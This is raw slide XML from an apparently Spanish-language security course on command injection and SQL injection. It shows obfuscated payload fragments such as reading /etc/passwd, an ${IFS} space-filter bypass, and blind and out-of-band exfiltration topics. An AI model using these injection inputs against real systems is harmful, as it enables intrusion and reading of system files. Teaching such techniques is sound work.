                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>$@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>wd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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>``</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>wd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27808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5324B8-E7B3-E5A8-CD7A-16AEF64B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F681C9-E369-6181-7EB4-83D946E704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D1A15A0-924F-D26A-39C2-E7A7BBA2FBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="209550" y="209550"/>
            <a:ext cx="11982449" cy="6648450"/>
            <a:chOff x="209550" y="209550"/>
            <a:chExt cx="11982449" cy="664845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EE27752-7F22-5D2C-21E3-BB0A7EDE71D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" y="5610225"/>
              <a:ext cx="3295649" cy="1247775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193AD51-7064-C903-21AC-F6BE20EAE9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3675" y="209550"/>
              <a:ext cx="1838324" cy="2095499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AB463BF-A9E5-E045-44E3-09B00057CE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97879" y="3003933"/>
            <a:ext cx="3598936" cy="1062406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lang="en-US" sz="5400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyecciones</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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19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006A2-8520-3A1F-73FE-11C309FD4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E738AD-2476-49DC-9031-9BB300F00AE8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695BC14-4ACF-3C0E-AD03-7873F7ACD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III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03118AD-BA83-B4D5-DFFD-C9CA58C569C8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3493264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Bypass de espacios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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>! Prohibido utilizar  espacios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echo${IFS}a${IFS}Bona${IFS}le${IFS}falta${IFS}calle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C792BA5-1D79-630A-6A43-0751463A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8" y="5024966"/>
            <a:ext cx="7515225" cy="1104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247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B879-56FF-2E7A-2C5F-FC0C8A28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E9203-CE80-DF33-32C8-3007E0A04442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16DDFDB-B6DA-AF37-E309-EF98BBBB7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III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 dirty="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2DD4BA1-FF01-5001-94E3-A4706C779B54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3862596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¿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> pasa si la aplicación web no devuelve el output de la consulta?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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Blind</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" spc="-25">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1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$&gt; time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418225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C468-816F-6998-F398-4C1827E46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5FCB3-4BFE-8D4E-AAB5-E1223DB9906D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E13BA53-2843-D0A9-BF1B-87F77DF70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3106" y="69791"/>
            <a:ext cx="5338934" cy="1467068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Command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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a: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 III</a:t>
            </a:r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464B231-9E90-824B-79A2-BC9B794298D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1751890"/>
            <a:ext cx="9051241" cy="3862596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¿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> pasa si la aplicación web no devuelve el output de la consulta?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Out</a:t>
            </a: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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="24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of</a:t>
            </a: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-band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>exfiltration</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" spc="-25">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style"/>
              <a:ea typeface="Batang"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-3429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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>exfiltration</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" spc="-25">
              <a:latin typeface="Bookman Old Style"/>
              <a:ea typeface="Batang"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>exfiltration</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" spc="-25" dirty="0">
              <a:latin typeface="Bookman Old Style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110751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D06E21-1FFA-1A43-3706-2C0121D1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3A944D3D-DF3F-AF74-C0E0-E81BECD5AC5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502205" y="2654682"/>
            <a:ext cx="6361186" cy="1154739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lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Practice </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0">
              <a:ea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2FC1A97-1D7B-D8EB-C16B-6B882B204065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5862612" y="2658915"/>
            <a:ext cx="6361186" cy="1154739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30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty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04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D32624-3A89-3C75-C400-BD37FB1F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3F2503-D5E2-8F7F-834B-90BB9239A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A1DC5A2-A164-704D-A720-B05E6F383749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="209550" y="209550"/>
            <a:ext cx="11982449" cy="6648450"/>
            <a:chOff x="209550" y="209550"/>
            <a:chExt cx="11982449" cy="664845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ADB3C8A8-7725-1D7E-5962-45EB2B8253B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" y="5610225"/>
              <a:ext cx="3295649" cy="1247775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EE74675E-3A75-FA01-47D9-24F2CA2308D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3675" y="209550"/>
              <a:ext cx="1838324" cy="2095499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F132F4BA-35E4-216F-623B-3B71A931C0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16212" y="2898099"/>
            <a:ext cx="6361186" cy="1062406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lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
              </a:rPr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389672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69554-649D-26EB-EF45-7469DEEF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24A75E-6B1D-0668-23FC-D0E3CAC72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85875" y="1154176"/>
            <a:ext cx="5827395" cy="3649717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960"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CB0016"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0"/>
              <a:t>¿Qué es SQL?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="527050" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1870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25" dirty="0"/>
              <a:t>¿Qué es una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="527050" indent="-51435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10" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0"/>
              <a:t> bypass con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr spc="-10" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="527050" indent="-51435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20" dirty="0"/>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-20" dirty="0" err="1"/>
              <a:t>injections</a:t>
            </a:r>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB0016"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0"/>
              <a:t>Enumeración</a:t>
            </a:r>
            <a:endParaRPr spc="-1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1A430E3-E774-A394-ACBB-3760A72C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100" y="0"/>
            <a:ext cx="9944100" cy="104775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255270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2010"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="0" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ÍNDICE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2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8033" y="1352486"/>
            <a:ext cx="5291455" cy="5506085"/>
            <a:chOff x="3448033" y="1352486"/>
            <a:chExt cx="5291455" cy="5506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033" y="1352486"/>
              <a:ext cx="5291234" cy="55055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100" y="1352549"/>
              <a:ext cx="5257799" cy="550544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775" y="5867400"/>
            <a:ext cx="1981199" cy="7524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71550" y="5648325"/>
            <a:ext cx="10248900" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10248900" h="47625">
                <a:moveTo>
                  <a:pt x="10248900" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10248900" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10248900" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CB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43400" y="2286000"/>
            <a:ext cx="3901186" cy="15036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s-ES" sz="4800" spc="-25" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>¿Qué es SQL?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1485900" cy="1047750"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1485900" cy="10477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66825" cy="1047750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1266825" h="1047750">
                  <a:moveTo>
                    <a:pt x="0" y="1047749"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1266824" y="1047749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266824" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="104774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1450"/>
              <a:ext cx="1485900" cy="6953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854180" y="3363277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s-ES" sz="3600" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>¿Qué es SQL?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660BD14-6998-7910-B121-5F993EBEEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941306" y="1882648"/>
            <a:ext cx="1081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Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL es un lenguaje de programación dedicado a bases de datos relacionales</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Capítulo 7 El Modelo Relacional | Base de Datos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4814F6AB-CC38-741F-2C46-CC36CEB5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r="15802" b="33741"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="941306" y="3093710"/>
            <a:ext cx="6068036" cy="18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202472D3-FBE6-886A-5FD0-D9859B05A4A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3151106" y="27243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Relacional</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Duda Stickers - Find &amp; Share on GIPHY">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53A20EF0-8DE6-38F4-D6FF-D7F6980B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67" y="4751138"/>
            <a:ext cx="2578126" cy="257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ySQL | ELbuild">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8266BF98-B055-AB13-849F-A8ED355B2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13" y="2459118"/>
            <a:ext cx="2889420" cy="28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6C3894-C175-B7B3-998A-66398C0B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43200"/>
            <a:ext cx="8610600" cy="2154436"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT nombre, edad FROM usuarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>edad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> &gt; 18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> LIMIT 5</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT ‘ola’, 1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4" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B0D511F-65B2-294A-09C0-26E400E420E4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s-ES" sz="3600" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Qué es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" spc="-25" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL:Sintáxis</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" spc="-25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9932CC-29D7-34D3-6692-D5111F5CB3CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7400925" y="2570499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</a:rPr>
              <a:t>COMENTARIOS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-- comentario </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/*comentario*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># comentario -&gt; MySQL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75F047-FBFF-AF07-C5B7-7C2F6B5FD81E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448979" y="541098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String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Integer</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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9BBC0D-22B2-B8CE-2434-A83AD16D8A9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1838227" y="4897636"/>
            <a:ext cx="179109" cy="513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DFA2D45-1DF0-FC70-2FAE-EA76455BE7C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2564091" y="4897636"/>
            <a:ext cx="169682" cy="513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80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4DC149D6-2415-F3E2-7D46-81D1A2A23A6F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s-ES" sz="3600" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Qué es SQL: Operadores lógicos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6ED0CC-6E55-14A1-1AFD-CC8C677A0054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2057400" y="2209800"/>
            <a:ext cx="833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SELECT * FROM usuarios WHERE edad &gt; 18 AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nacho_putero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'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46A1C53-5B10-D630-32CB-0D26674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979286"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="4114800"/>
          <a:ext cx="3276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355864841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6354087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45031732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s-E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54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55975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3268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FLASE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831513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738B4526-4552-07D9-6108-BF2FEDB9C2DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="358616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AND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9979F5D2-8BFA-E7AB-88FD-AC057A1BFB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5599029" y="1112028"/>
            <a:ext cx="400052" cy="1844511"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33075"/>
              <a:gd name="adj2" fmla="val 494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B706A1C5-C9F6-67F6-3ACB-758A6FA90918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8410574" y="800158"/>
            <a:ext cx="400052" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33075"/>
              <a:gd name="adj2" fmla="val 4940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A31CB9-1E6C-0C28-EBE4-F5A4D41216A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
